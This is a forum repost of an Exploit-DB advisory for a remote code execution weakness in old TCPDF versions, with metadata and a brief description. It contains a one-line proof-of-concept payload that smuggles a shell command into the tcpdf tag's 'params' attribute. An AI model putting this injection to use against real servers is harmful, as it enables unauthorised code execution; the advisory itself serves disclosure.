Exploit TCPDF 4.5.036/4.9.5 - 'params' Attribute Remote Code Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
33826
Проверка EDB
  1. Пройдено
Автор
APOC
Тип уязвимости
REMOTE
Платформа
LINUX
CVE
N/A
Дата публикации
2010-04-08
Код:
source: https://www.securityfocus.com/bid/39315/info

TCPDF is prone to a security weakness that may allow attackers to execute arbitrary code.

An attacker can exploit this issue in conjunction with other latent vulnerabilities to execute arbitrary code with the privileges of the webserver.

Versions prior to TCPDF 4.9.006 are vulnerable. 

<tcpdf method="Rect" params=");echo `id`;die(" />
 
Источник
www.exploit-db.com

Похожие темы